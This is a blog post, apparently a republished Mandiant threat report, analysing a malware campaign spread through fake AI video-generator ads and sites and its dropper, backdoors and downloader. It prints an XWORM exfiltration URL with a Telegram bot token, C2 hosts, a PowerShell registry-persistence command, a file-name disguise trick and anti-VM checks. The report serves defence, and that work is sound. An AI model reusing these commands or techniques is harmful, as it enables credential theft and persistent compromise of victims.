{"id":11999,"date":"2025-07-08T12:34:23","date_gmt":"2025-07-08T12:34:23","guid":{"rendered":"https:\/\/www.ntspl.co.in\/blog\/?p=11999"},"modified":"2025-07-08T12:46:02","modified_gmt":"2025-07-08T12:46:02","slug":"text-to-malware-how-cybercriminals-weaponize-fake-ai-themed-websites","status":"publish","type":"post","link":"https:\/\/www.ntspl.co.in\/blog\/text-to-malware-how-cybercriminals-weaponize-fake-ai-themed-websites\/","title":{"rendered":"Text-to-Malware: How Cybercriminals Weaponize Fake AI-Themed Websites"},"content":{"rendered":"
\n

Since November 2024, Mandiant Threat Defense<\/a> has been investigating an UNC6032 campaign that weaponizes the interest around AI tools, in particular those tools which can be used to generate videos based on user prompts. UNC6032 utilizes fake \u201cAI video generator\u201d websites to distribute malware leading to the deployment of payloads such as Python-based infostealers and several backdoors. Victims are typically directed to these fake websites via malicious social media ads that masquerade as legitimate AI video generator tools like Luma AI, Canva Dream Lab, and Kling AI, among others. Mandiant Threat Defense has identified thousands of UNC6032-linked ads that have collectively reached millions of users across various social media platforms like Facebook and LinkedIn. We suspect similar campaigns are active on other platforms as well, as cybercriminals consistently evolve tactics to evade detection and target multiple platforms to increase their chances of success.<\/p>\n<\/div>\n

\n

Mandiant Threat Defense has observed UNC6032 compromises culminating in the exfiltration of login credentials, cookies, credit card data, and Facebook information through the Telegram API. This campaign has been active since at least mid-2024 and has impacted victims across different geographies and industries. Google Threat Intelligence Group (GTIG) assesses UNC6032 to have a Vietnam nexus.<\/p>\n

Mandiant Threat Defense acknowledges Meta’s collaborative and proactive threat hunting efforts in removing the identified malicious ads, domains, and accounts. Notably, a significant portion of Meta\u2019s detection and removal began in 2024, prior to Mandiant alerting them of additional malicious activity we identified.<\/p>\n

A similar investigation<\/a> was recently published by Morphisec.<\/p>\n<\/div>\n

\n

Campaign Overview<\/h2>\n

Threat actors haven’t wasted a moment capitalizing on the global fascination with Artificial Intelligence. As AI’s popularity surged over the past couple of years, cybercriminals quickly moved to exploit the widespread excitement. Their actions have fueled a massive and rapidly expanding campaign centered on fraudulent websites masquerading as cutting-edge AI tools. These websites have been promoted by a large network of misleading social media ads, similar to the ones shown in Figure 1 and Figure 2.<\/p>\n<\/div>\n

\n
\n
\n

Figure 1: Malicious Facebook ads<\/p>\n<\/div>\n<\/div>\n<\/div>\n

\n
\n
\n

Figure 2: Malicious LinkedIn ads<\/p>\n<\/div>\n<\/div>\n<\/div>\n

\n

As part of Meta\u2019s implementation of the Digital Services Act<\/a>, the Ad Library displays additional information (ad campaign dates, targeting parameters and ad reach) on all ads that target people from the European Union. LinkedIn has also implemented a similar transparency tool.<\/p>\n

Our research through both Ad Library tools identified over 30 different websites, mentioned across thousands of ads, active since mid 2024, all displaying similar ad content. The majority of ads which we found ran on Facebook, with only a handful also advertised on LinkedIn. The ads were published using both attacker-created Facebook pages, as well as by compromised Facebook accounts. Mandiant Threat Defense performed further analysis of a sample of over 120 malicious ads and, from the EU transparency section of the ads, their total reach for EU countries was over 2.3 million users. Table 1 displays the top 5 Facebook ads by reach. It should be noted that reach does not equate to the number of victims. According to Meta<\/a>, the reach of an ad is an estimated number of how many Account Center accounts saw the ad at least once.<\/p>\n<\/div>\n

\n\n\n\n\n\n<\/colgroup>\n\n\n\n\n\n\n\n
Ad Library ID<\/td>\nAd Start Date<\/td>\nAd End Date<\/td>\nEU Reach<\/td>\n<\/tr>\n
1589369811674269<\/td>\n14.12.2024<\/td>\n18.12.2024<\/td>\n300,943<\/td>\n<\/tr>\n
559230916910380<\/td>\n04.12.2024<\/td>\n09.12.2024<\/td>\n298,323<\/td>\n<\/tr>\n
926639029419602<\/td>\n07.12.2024<\/td>\n09.12.2024<\/td>\n270,669<\/td>\n<\/tr>\n
1097376935221216<\/td>\n11.12.2024<\/td>\n12.12.2024<\/td>\n124,103<\/td>\n<\/tr>\n
578238414853201<\/td>\n07.12.2024<\/td>\n10.12.2024<\/td>\n111,416<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

Table 1: Top 5 Facebook ads by reach<\/p>\n<\/div>\n

\n

The threat actor constantly rotates the domains mentioned in the Facebook ads, likely to avoid detection and account bans. We noted that once a domain is registered, it will be referenced in ads within a few days if not the same day. Moreover, most of the ads are short lived, with new ones being created on a daily basis.<\/p>\n

On LinkedIn, we identified roughly 10 malicious ads, each directing users to hxxps:\/\/klingxai[.]com. This domain was registered on September 19, 2024, and the first ad appeared just a day later. These ads have a total impression estimate of 50k-250k. For each ad, the United States was the region with the highest percentage of impressions, although the targeting included other regions such as Europe and Australia.<\/p>\n<\/div>\n

\n
\n\n\n\n\n\n\n<\/colgroup>\n\n\n\n\n\n\n\n\n
Ad Library ID<\/td>\nAd Start Date<\/td>\nAd End Date<\/td>\nTotal Impressions<\/td>\n% Impressions in the US<\/td>\n<\/tr>\n
490401954<\/td>\n20.09.2024<\/td>\n20.09.2024<\/td>\n<1k<\/td>\n22<\/td>\n<\/tr>\n
508076723<\/td>\n27.09.2024<\/td>\n28.09.2024<\/td>\n10k-50k<\/td>\n68<\/td>\n<\/tr>\n
511603353<\/td>\n30.09.2024<\/td>\n01.10.2024<\/td>\n10k-50k<\/td>\n61<\/td>\n<\/tr>\n
511613043<\/td>\n30.09.2024<\/td>\n01.10.2024<\/td>\n10k-50k<\/td>\n40<\/td>\n<\/tr>\n
511613633<\/td>\n30.09.2024<\/td>\n01.10.2024<\/td>\n10k-50k<\/td>\n54<\/td>\n<\/tr>\n
511622353<\/td>\n30.09.2024<\/td>\n01.10.2024<\/td>\n10k-50k<\/td>\n36<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n

Table 2: LinkedIn ads<\/p>\n<\/div>\n

\n

From the websites investigated, Mandiant Threat Defense observed that they have similar interfaces and offer purported functionalities such as text-to-video or image-to-video generation. Once the user provides a prompt to generate a video, regardless of the input, the website will serve one of the static payloads hosted on the same (or related) infrastructure.<\/p>\n

The payload downloaded is the STARKVEIL malware. It drops three different modular malware families, primarily designed for information theft and capable of downloading plugins to extend their functionality. The presence of multiple, similar payloads suggests a fail-safe mechanism, allowing the attack to persist even if some payloads are detected or blocked by security defences.<\/p>\n

In the next section, we will delve deeper into one particular compromise Mandiant Threat Defense responded to.<\/p>\n

Luma AI Investigation<\/h2>\n

Infection Chain<\/h3>\n

<\/p>\n<\/div>\n

\n
\n
\n

Figure 3: Infection chain lifecycle<\/p>\n<\/div>\n<\/div>\n<\/div>\n

\n

This blog post provides a detailed analysis of our findings on the key components of this campaign:<\/p>\n

Lure: <\/strong>The threat actors leverage social networks to push AI-themed ads that direct users to fake AI websites, resulting in malware downloads.<\/p>\n

Malware<\/strong>: It contains several malware components, including the STARKVEIL dropper, which deploys the XWORM and FROSTRIFT backdoors and the GRIMPULL downloader.<\/p>\n

Execution<\/strong>: The malware makes extensive use of DLL side-loading, in-memory droppers, and process injection to execute its payloads.<\/p>\n

Persistence<\/strong>: It uses AutoRun registry key for its two Backdoors (XWORM and FROSTRIFT).<\/p>\n

Anti-VM and Anti-analysis<\/strong>: GRIMPULL checks for commonly used artifactsfeatures from known Sandbox and analysis tools.<\/p>\n

Reconnaissance<\/strong><\/p>\n

Host reconnaissance<\/strong>: XWORM and FROSTRIFT survey the host by collecting information, including OS, username, role, hardware identifiers, and installed AV.<\/p>\n

Software reconnaissance<\/strong>: FROSTRIFT checks the existence of certain messaging applications and browsers.<\/p>\n

Command-and-control (C2)<\/strong><\/p>\n

Tor<\/strong>: GRIMPULL utilizes a Tor Tunnel to fetch additional .NET payloads.<\/p>\n

Telegram<\/strong>: XWORM sends victim notification via telegram including information gathered during host reconnaissance.<\/p>\n

TCP<\/strong>: The malware connects to its C2 using ports 7789, 25699, 56001.<\/p>\n

Information stealer\u00a0<\/strong><\/p>\n

Keylogger<\/strong>: XWORM log keystrokes from the host.<\/p>\n

Browser extensions<\/strong>: FROSTRIFT scans for 48 browser extensions related to Password managers, Authenticators, and Digital wallets potentially for data theft.<\/p>\n

Backdoor Commands<\/strong>: XWORM supports multiple commands for further compromise.<\/p>\n

The Lure<\/h3>\n

This particular case began from a Facebook Ad for \u201cLuma Dream AI Machine\u201d, masquerading as a well-known text-to-video AI tool – Luma AI. The ad, as seen in Figure 4, redirected the user to an attacker-created website hosted at hxxps:\/\/lumalabsai[.]in\/.<\/p>\n

<\/p>\n<\/div>\n

\n
\n
\n

Figure 4: The ad the victim clicked on<\/p>\n<\/div>\n<\/div>\n<\/div>\n

\n

Once on the fake Luma AI website, the user can click the \u201cStart Free Now\u201d button and choose from various video generation functionalities. Regardless of the selected option, the same prompt is displayed, as shown in the GIF in Figure 5.<\/p>\n

This multi-step process, made to resemble any other legitimate text-to-video or image-to-video generation tool website, creates a sense of familiarity to the user and does not give any immediate indication of malicious intent. Once the user hits the generate button, a loading bar appears, mimicking an AI model hard at work. After a few seconds, when the new video is supposedly ready, a Download button is displayed. This leads to the download of a ZIP archive file on the victim host.<\/p>\n

<\/p>\n<\/div>\n

\n
\n
\n

Figure 5: Fake AI video generation website<\/p>\n<\/div>\n<\/div>\n<\/div>\n

\n

Unsurprisingly, the ready-to-download archive is one of many payloads already hosted on the same server, with no connection to the user input. In this case, several archives were hosted at the path hxxps:\/\/lumalabsai[.]in\/complete\/. Mandiant determined that the website will serve the archive file with the most recent \u201cLast Modified\u201d value, indicating continuous updates by the threat actor. Mandiant compared some of these payloads and found them to be functionally similar, with different obfuscation techniques applied, thus resulting in different sizes.<\/p>\n

<\/p>\n<\/div>\n

\n
\n
\n

Figure 6: Payloads hosted at hxxps:\/\/lumalabsai[.]in\/complete<\/p>\n<\/div>\n<\/div>\n<\/div>\n

\n

Execution<\/h3>\n

The previously downloaded ZIP archive contains an executable with a double extension (.mp4 and .exe) in its name, separated by thirteen Braille Pattern Blank (Unicode: U+2800, UTF-8: E2 A0 80)\u00a0characters. This is a special whitespace character from the Braille Pattern Block in Unicode.<\/p>\n

<\/p>\n<\/div>\n

\n
\n
\n

Figure 7: Braille Pattern Blank characters in the file name<\/p>\n<\/div>\n<\/div>\n<\/div>\n

\n

The resulting file name, Lumalabs_1926326251082123689-626.mp4\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800.exe, aims to make the binary less suspicious by pushing the .exe extension out of the user view. The number of Braille Pattern Blank characters used varies across different samples served, ranging from 13 to more than 30. To further hide the true purpose of this binary, the default .mp4 Windows icon is used on the malicious file.<\/p>\n

Figure 8 shows how the file looks on Windows 11, compared to a legitimate .mp4 file.<\/p>\n

<\/p>\n<\/div>\n

\n
\n
\n

Figure 8: Malicious binary vs legitimate .mp4 file<\/p>\n<\/div>\n<\/div>\n<\/div>\n

\n

STARKVEIL<\/h3>\n

The binary Lumalabs_1926326251082123689-626.mp4\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800.exe, tracked by Mandiant as STARKVEIL,<\/strong> is a dropper written in Rust. Once executed, it extracts an embedded archive containing benign executables and its malware components. These are later utilized to inject malicious code into several legitimate processes.<\/p>\n

Executing the malware displays an error window, as seen in Figure 9, to trick the user into trying to execute it again and into believing that the file is corrupted.<\/p>\n

<\/p>\n<\/div>\n

\n
\n
\n

Figure 9: Error window displayed when executing STARKVEIL<\/p>\n<\/div>\n<\/div>\n<\/div>\n

\n

For a successful compromise, the executable needs to run twice; the initial execution results in the extraction of all the embedded files under the C:winsystem directory.<\/p>\n

<\/p>\n<\/div>\n

\n
\n
\n

Figure 10: Files in the winsystem directory<\/p>\n<\/div>\n<\/div>\n<\/div>\n

\n

During the second execution, the main executable spawns the Python Launcher, py.exe, with an obfuscated Python command as an argument. The Python command decodes an embedded Python code, which Mandiant tracks as COILHATCH dropper. COILHATCH performs the following actions (note that the script has been deobfuscated and renamed for improved readability):<\/p>\n

The command takes a Base85-encoded string, decodes it, decompresses the result using zlib, deserializes the resulting data using the marshalmodule, and then executes the final deserialized data as Python code.<\/p>\n

<\/p>\n<\/div>\n

\n
\n
\n

Figure 11: Python command<\/p>\n<\/div>\n<\/div>\n<\/div>\n

The decompiled first-stage Python code combines RSA, AES, RC4, and XOR techniques to decrypt the second stage Python bytecode.<\/div>\n
<\/div>\n
<\/div>\n
\n
\n
\n

Figure 12: First-stage Python<\/p>\n<\/div>\n<\/div>\n<\/div>\n

The decrypted second-stage Python script executes C:winsystemheifheif.exe, which is a legitimate, digitally signed executable, used to side-load a malicious DLL. This serves as the launcher to execute the other malware components.<\/div>\n
<\/div>\n
\n
\n
\n

Figure 13: Second-stage Python<\/p>\n<\/div>\n<\/div>\n<\/div>\n

\n

The following is the resulting process tree:<\/p>\n<\/div>\n

explorer.exe
\n\u21b3 7zfm.exe “<path>Lumalabs_1926326251082123689-626.zip”
\n\u21b3 “<path>lumalabs_1926326251082123689-626.mp4\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800.exe”
\n\u21b3 “C:winsystempypy.exe” -c exec(__import__ ..<ENCODED PYTHON CODE>..)
\n\u21b3 “C:WINDOWSsystem32cmd.exe” \/c “C:winsystemheifheif.exe”
\n\u21b3 “C:winsystemheifheif.exe”<\/div>\n
\n

Malware Analysis<\/h3>\n

As mentioned, the STARKVEIL malware drops its components during its first execution and executes a launcher on its second execution. The complete analysis of all the malware components and their roles is provided in the next sections.<\/p>\n<\/div>\n

\n
\n\n\n\n\n\n<\/colgroup>\n\n\n\n\n\n\n\n\n\n
Directory<\/td>\nBenign File<\/td>\nSide-Loaded DLL<\/td>\nRole (Malware)<\/td>\n<\/tr>\n
C:\\winsystem\\heif<\/td>\nheif.exe<\/td>\nheif.dll
\n(SHA256: 839260ac321a44da55d4e6a5130c12869066af712f71c558bd42edd56074265b)<\/td>\n		Launcher<\/td>\n<\/tr>\n
%APPDATA%\\Launcher<\/td>\nLauncher.exe<\/td>\nlibde265.dll
\n(SHA256: 4982a33e0c2858980126b8279191cb4eddd0a35f936cf3eda079526ba7c76959)<\/td>\n		Persistence<\/td>\n<\/tr>\n
%APPDATA%\\python<\/td>\npython.exe<\/td>\navcodec-61.dll
\n(SHA256: 8d2c9c2b5af31e0e74185a82a816d3d019a0470a7ad8f5c1b40611aa1fd275cc)<\/td>\n		Downloader (GRIMPULL)<\/td>\n<\/tr>\n
%APPDATA%\\pythonw<\/td>\npythonw.exe<\/td>\nheif.dll
\n(SHA256: a0e75bd0b0fa0174566029d0e50875534c2fcc5ba982bd539bdeff506cae32d3)<\/td>\n		Backdoor executed at runtime (XWORM)<\/td>\n<\/tr>\n
C:\\winsystem\\heif-info<\/td>\nheif-info.exe<\/td>\nheif.dll
\n(SHA256: 1a037da4103e38ff95cb0008a5e38fd6a8e7df5bc8e2d44e496b7a5909ddebeb)<\/td>\n		Backdoor for persistence (XWORM)<\/td>\n<\/tr>\n
%APPDATA%\\ffplay<\/td>\nffplay.exe<\/td>\nlibde265.dll
\n(SHA256: dcb1e9c6b066c2169928ae64e82343a250261f198eb5d091fd7928b69ed135d3)<\/td>\n		Backdoor executed at runtime (FROSTRIFT)<\/td>\n<\/tr>\n
C:\\winsystem\\heif2rgb<\/td>\nheif2rgb.exe<\/td>\nheif.dll
\n(SHA256: e663c1ba289d890a74e33c7e99f872c9a7b63e385a6a4af10a856d5226c9a822)<\/td>\n		Backdoor for persistence (FROSTRIFT)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n

Table 3: Malware components<\/p>\n<\/div>\n

\n

Each of these DLLs operates as an in-memory dropper and spawns a new victim process to perform code injection through process replacement.<\/p>\n

Launcher<\/h4>\n

The execution of C:winsystemheifheif.exe results in the side-loading of the malicious heif.dll, <\/strong>located in the same directory. This DLL is an in-memory dropper that spawns a legitimate Windows process (which may vary) and performs code injection through process replacement.<\/p>\n

The injected code is a .NET executable that acts as a launcher and performs the following:<\/p>\n

Moves multiple folders from C:winsystem to %APPDATA%. The destination folders are:<\/p>\n

%APPDATA%python
\n%APPDATA%pythonw
\n%APPDATA%ffplay
\n%APPDATA%Launcher<\/p>\n

Launches three legitimate processes to side-load associated malicious DLLs. The malicious DLLs for each process are:<\/p>\n

python.exe: %APPDATA%pythonavcodec-61.dll
\npythonw.exe: %APPDATA%pythonwheif.dll
\nffplay.exe: %APPDATA%ffplaylibde265.dll<\/p>\n

Establishes persistence via AutoRun registry key.<\/p>\n

value<\/strong>: Dropbox
\nkey<\/strong>: SOFTWAREMicrosoftWindowsCurrentVersionRun
\nroot<\/strong>: HKCU
\nvalue data<\/strong>: “cmd.exe \/c “cd \/d “<exePath>” && “Launcher.exe””<\/p>\n

<\/p>\n<\/div>\n

\n
\n
\n

Figure 14: Main function of launcher<\/p>\n<\/div>\n<\/div>\n<\/div>\n

\n

The AutoRun Key executes %APPDATA%LauncherLauncher.exe that sideloads the DLL file libde265.dll. This DLL spawns and injects its payload into AddInProcess32.exe via PE hollowing. The injected code\u2019s main purpose is to execute the legitimate binaries C:winsystemheif2rgbheif2rgb.exe and C:winsystemheif-infoheif-info.exe, which, in turn, sideload the backdoors XWORM and FROSTRIFT, respectively.<\/p>\n

GRIMPULL<\/h4>\n

Of the three executables, the launcher first executes %APPDATA%pythonpython.exe, which side-loads the DLL avcodec-61.dll and injects the malware GRIMPULL into a legitimate Windows process.<\/p>\n

GRIMPULL is a .NET-based downloader that incorporates anti-VM capabilities and utilizes Tor for C2 server connections.<\/p>\n

Anti-VM and Anti-Analysis<\/h5>\n

GRIMPULL begins by checking for the presence of the mutex value aff391c406ebc4c3, and terminates itself if this is found. Otherwise, the malware proceeds to perform further anti-VM checks, exiting in case any of the mentioned checks succeeds.<\/p>\n\n\n\n<\/colgroup>\n\n\n\n\n\n\n\n\n\n
Anti-VM and Anti-Analysis Checks<\/td>\n<\/tr>\n
Module Detection<\/td>\nChecks for sandbox\/analysis tool DLLs:
\nSbieDll.dll (Sandboxie)<\/p>\n

cuckoomon.dll (Cuckoo Sandbox)<\/td>\n<\/tr>\n

BIOS Information Checks<\/td>\nQueries Win32_BIOS via WMI and checks version and serial number for:
\nVMware<\/p>\n

VIRTUAL<\/p>\n

A M I (AMI BIOS)<\/p>\n

Xen<\/td>\n<\/tr>\n

Parent Process Check<\/td>\nChecks if parent process is cmd (command line)<\/td>\n<\/tr>\n
VM File Detection<\/td>\nChecks for existence of vmGuestLib.dll in the System folder<\/td>\n<\/tr>\n
System Manufacturer Checks<\/td>\nQueries Win32_ComputerSystem via WMI and checks manufacturer and model for:
\nMicrosoft (Hyper-V)<\/p>\n

VMWare<\/p>\n

Virtual<\/td>\n<\/tr>\n

Display and System Configuration Checks<\/td>\nChecks for specific screen resolutions:
\n1440×900<\/p>\n

1024×768<\/p>\n

1280×1024<\/p>\n

Checks if the OS is 32-bit<\/td>\n<\/tr>\n

Username Checks<\/td>\nChecks for common analysis environment usernames:
\njohn<\/p>\n

anna<\/p>\n

Any username containing xxxxxxxx<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n

\n
\n
\n
\n

Anti-VM and Anti-Analysis Checks<\/p>\n

\n
\n
Download Function<\/h5>\n

GRIMPULLverifies the presence of a Tor process. If a Tor process is not detected, it proceeds to download, decompress, and execute Tor from the following URL:<\/p>\n<\/div>\n<\/section>\n

\n
\n
https:\/\/archive.torproject.org\/tor-package-archive\/torbrowser\/13.0.9\/\r\ntor-expert-bundle-windows-i686-13.0.9.tar.gz<\/code><\/pre>\n<\/div>\n<\/section>\n
\n
<\/div>\n
Figure 15: Download function<\/div>\n<\/section>\n<\/div>\n<\/div>\n
Afterwards, Tor will run locally on port\u00a09050<\/code>.<\/div>\n<\/div>\n
\n
\n
\n
C2 Communication<\/h5>\n
GRIMPULL then attempts to connect to the following C2 server via the Tor tunnel over TCP.<\/p>\n<\/div>\n<\/section>\n
\n
\n
strokes[.]zapto[.]org:7789<\/code><\/pre>\n<\/div>\n<\/section>\n
\n
\n
The malware maintains this connection and periodically checks for .NET payloads. Fetched payloads are decrypted using\u00a0TripleDES<\/code>\u00a0in ECB mode with the\u00a0MD5<\/code>\u00a0hash of the campaign ID\u00a0aff391c406ebc4c3<\/code>\u00a0as the decryption key, decompressed with\u00a0GZip<\/code>\u00a0(using a 4-byte length prefix), reversed, and then loaded into memory as .NET assemblies.<\/p>\n
Malware Configuration<\/h5>\n
The configuration elements are encoded as\u00a0base64<\/code>\u00a0strings, as shown in Figure 16.<\/p>\n
<\/p>\n
Figure 16: Encoded malware configuration<\/p>\n
Table 5 shows the extracted malware configuration.<\/p>\n\n\n\n<\/colgroup>\n\n\n\n\n\n\n
GRIMPULL Malware Configuration<\/td>\n<\/tr>\n
C2 domain\/server<\/td>\nstrokes[.]zapto[.]org<\/td>\n<\/tr>\n
Port number<\/td>\n7789<\/td>\n<\/tr>\n
Unique identifier\/campaign ID<\/td>\naff391c406ebc4c3<\/td>\n<\/tr>\n
Configuration profile name<\/td>\nDefault<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
Table 5: GRIMPULL configuration<\/p>\n
XWORM<\/h4>\n
Secondly, the launcher executes the file\u00a0%APPDATA%\\pythonw\\pythonw.exe<\/code>, which side-loads the DLL\u00a0heif.dll<\/code>\u00a0and injects XWORM into a legitimate Windows process.<\/p>\n
XWORM is a .NET-based backdoor that communicates using a custom binary protocol over TCP. Its core functionality involves expanding its capabilities through a plugin management system. Downloaded plugins are written to disk and executed. Supported capabilities include keylogging, command execution, screen capture, and spreading to USB drives.<\/p>\n
XWORM Configuration<\/h5>\n
The malware begins by decoding its configuration using the\u00a0AES<\/code>\u00a0algorithm.<\/p>\n
<\/p>\n
Figure 17: Decryption of configuration<\/p>\n
Table 6 shows the extracted malware configuration.<\/p>\n\n\n\n<\/colgroup>\n\n\n\n\n\n\n\n\n\n\n\n
XWORM Malware Configuration<\/td>\n<\/tr>\n
Host<\/td>\nartisanaqua[.]ddnsking[.]com<\/td>\n<\/tr>\n
Port number<\/td>\n25699<\/td>\n<\/tr>\n
KEY<\/td>\n<123456789><\/td>\n<\/tr>\n
SPL<\/td>\n<Xwormmm><\/td>\n<\/tr>\n
Version<\/td>\nXWorm V5.2<\/td>\n<\/tr>\n
USBNM<\/td>\nUSB.exe<\/td>\n<\/tr>\n
Telegram Token<\/td>\n8060948661:AAFwePyBCBu9X-gOemLYLlv1owtgo24fcO0<\/td>\n<\/tr>\n
Telegram ChatID<\/td>\n-1002475751919<\/td>\n<\/tr>\n
Mutex<\/td>\nZMChdfiKw2dqF51X<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
Table 6:\u00a0XWORM configuration<\/p>\n
Host Reconnaissance<\/h5>\n
The malware then performs a system survey to gather the following information:<\/p>\n
    \n
  • Bot ID<\/li>\n
  • Username<\/li>\n
  • OS Name<\/li>\n
  • If it\u2019s running on USB<\/li>\n
  • CPU Name<\/li>\n
  • GPU Name<\/li>\n
  • Ram Capacity<\/li>\n
  • AV Products list<\/li>\n<\/ul>\n
    Sample of collected information:<\/p>\n<\/div>\n<\/section>\n<\/div>\n<\/div>\n
    \n
    \u2620 [KW-2201]\r\n\r\nNew Clinet : <client_id_from_machine_info_hash>\r\nUserName : <victim_username>\r\nOSFullName : <victim_OS_name>\r\nUSB : <is_sample_name_USB.exe>\r\nCPU : <cpu_description>\r\nGPU : <gpu_description>\r\nRAM : <ram_size_in_GBs>\r\nGroub : <installed_av_solutions><\/code> This information is sent to a Telegram chat:<\/pre>\n
    hxxps[:]\/\/api[.]telegram[.]org:443\/bot8060948661:AAFwePyBCBu9X-gOemLYLlv1\r\nowtgo24fcO0\/sendMessage?chat_id=-1002475751919&text=<collected_sysinfo><\/code><\/pre>\n
    Keylogging<\/h5>\n
    The malware sample saves the logged keystrokes to the file\u00a0%temp%\\Log.tmp<\/code>.<\/strong><\/p>\n
    Sample of content of\u00a0Log.tmp<\/code>:<\/p>\n
    ....### explorer ###..[Back]\r\n[Back]\r\nb    \r\na\r\nn\r\nk\r\n[ENTER]<\/code><\/pre>\n
    \n
    \n
    C2 Communication<\/h5>\n
    The sample connects to its C2 server at\u00a0tcp:\/\/artisanaqua[.]ddnsking[.]com:25699<\/code>\u00a0and initially sends the following information to the C2:<\/p>\n<\/div>\n<\/section>\n
    \n
    \"INFO<Xwormmm>victim_id<Xwormmm>user<Xwormmm>
    \nos_name<Xwormmm>XWorm V5.2<Xwormmm>date_in_dd\/mm\/yyyy
    \n<Xwormmm>is_sample_name_USB.exe
    \n<Xwormmm>is_administrator<Xwormmm>has_webcam<Xwormmm>cpu_info
    \n<Xwormmm>gpu_info<Xwormmm>ram_size<Xwormmm>installed_AVs\"<\/code><\/p>\n
    Then the sample waits for any of the following supported commands:<\/p>\n\n\n\n\n\n<\/colgroup>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
    Command<\/td>\nDescription<\/td>\nCommand<\/td>\nDescription<\/td>\n<\/tr>\n
    pong<\/td>\necho back to server<\/td>\nStartDDos<\/td>\nSpam HTTP requests over TCP to target<\/td>\n<\/tr>\n
    rec<\/td>\nrestart bot<\/td>\nStopDDos<\/td>\nKill DDOS threads<\/td>\n<\/tr>\n
    CLOSE<\/td>\nshutdown bot<\/td>\nStartReport<\/td>\nList running processes continuously<\/td>\n<\/tr>\n
    uninstall<\/td>\nself delete<\/td>\nStopReport<\/td>\nKill process monitoring threads<\/td>\n<\/tr>\n
    update<\/td>\nuninstall and execute received new version<\/td>\nXchat<\/td>\nSend C2 message<\/td>\n<\/tr>\n
    DW<\/td>\nExecute file on disk via powershell<\/td>\nHosts<\/td>\nGet hosts file contents<\/td>\n<\/tr>\n
    FM<\/td>\nExecute .NET file in memory<\/td>\nShosts<\/td>\nWrite to file, likely to overwrite hosts file contents<\/td>\n<\/tr>\n
    LN<\/td>\nDownload file from supplied URL and execute on disk<\/td>\nDDos<\/td>\nUnimplemented<\/td>\n<\/tr>\n
    Urlopen<\/td>\nPerform network request via browser<\/td>\nngrok<\/td>\nUnimplemented<\/td>\n<\/tr>\n
    Urlhide<\/td>\nPerform network request in process<\/td>\nplugin<\/td>\nLoad a Bot plugin<\/td>\n<\/tr>\n
    PCShutdown<\/td>\nShutdown PC now<\/td>\nsavePlugin<\/td>\nSave plugin to registry and load it HKCU\\Software\\<victim_id>\\<plugin_name>=<plugin_bytes><\/td>\n<\/tr>\n
    PCRestart<\/td>\nRestart PC now<\/td>\nRemovePlugins<\/td>\nDelete all plugins in registry<\/td>\n<\/tr>\n
    PCLogoff<\/td>\nLog off<\/td>\nOfflineGet<\/td>\nRead Keylog<\/td>\n<\/tr>\n
    RunShell<\/td>\nExecute CMD on shell<\/td>\n$Cap<\/td>\nGet screen capture<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

    \nTable 7: Supported commands<\/span><\/p>\n
    FROSTRIFT<\/h4>\n
    Lastly, the\u00a0l<\/strong>auncher executes the file\u00a0%APPDATA%\\ffplay\\ffplay.exe<\/code>\u00a0to side-load the DLL\u00a0%APPDATA%\\ffplay\\libde265.dll<\/code>\u00a0and inject FROSTRIFT into a legitimate Windows process.<\/p>\n
    FROSTRIFT is a .NET backdoor that collects system information, installed applications, and crypto wallets. Instead of receiving C2 commands, it receives .NET modules that are stored in the registry to be loaded in-memory. It communicates with the C2 server using\u00a0GZIP<\/code>-compressed\u00a0protobuf<\/code>\u00a0messages over TCP\/SSL.<\/p>\n
    Malware Configuration<\/h5>\n
    The malware starts by decoding its configuration, which is a Base64-encoded and GZIP-compressed protobuf message embedded within the strings table.<\/p>\n
    <\/p>\n
    Figure 18: FROSTRIFT configuration<\/p>\n
    Table 8 shows the extracted malware configuration.<\/p>\n\n\n\n<\/colgroup>\n\n\n\n\n\n\n\n\n\n
    Field<\/td>\nValue<\/td>\n<\/tr>\n
    Protobuf Tag<\/td>\n38<\/td>\n<\/tr>\n
    C2 Domain<\/td>\nstrokes.zapto[.]org<\/td>\n<\/tr>\n
    C2 Port<\/td>\n56001<\/td>\n<\/tr>\n
    SSL Certificate<\/td>\n<Base64 encoded SSL certificate><\/td>\n<\/tr>\n
    Unknown<\/td>\nDefault<\/td>\n<\/tr>\n
    Installation folder<\/td>\nAPPDATA<\/td>\n<\/tr>\n
    Mutex<\/td>\n7d9196467986<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
    Table 8: FROSTRIFT configration<\/p>\n
    Persistence<\/h4>\n
    FROSTRIFT<\/strong>\u00a0can achieve persistence by running the command:<\/p>\n
    powershell.exe \"Remove-ItemProperty -Path 'HKCU:\\SOFTWARE\\
    \nMicrosoft\\Windows\\CurrentVersion\\Run' -Name '<sample_file_name>
    \n';New-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\
    \nCurrentVersion\\Run' -Name '<sample_file_name>' -Value '\"\"%APPDATA%
    \n\\<sample_file_name>\"\"' -PropertyType 'String'\"<\/code><\/code><\/p>\n
    The sample copies itself to %APPDATA% and adds a new registry value under HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run with the new file path as data to ensure persistence at each system startup.<\/p>\n
    Host Reconnaissance<\/h5>\n
    The following information is initially collected and submitted by the malware to the C2:<\/p>\n\n\n\n<\/colgroup>\n\n\n\n\n\n\n\n\n\n
    Collected Information<\/td>\n<\/tr>\n
    Host information<\/td>\nInstalled Anti-Virus<\/p>\n
    Web camera<\/p>\n
    Hostname<\/p>\n
    Username and Role<\/p>\n
    OS name<\/p>\n
    Local time<\/td>\n<\/tr>\n
    Victim ID<\/td>\nHEX digest of the MD5 hash for the following combined:
    \nSample process ID<\/p>\n
    Disk drive serial number<\/p>\n
    Physical memory serial number<\/p>\n
    Victim user name<\/td>\n<\/tr>\n
    Malware Version<\/td>\n4.1.8<\/td>\n<\/tr>\n
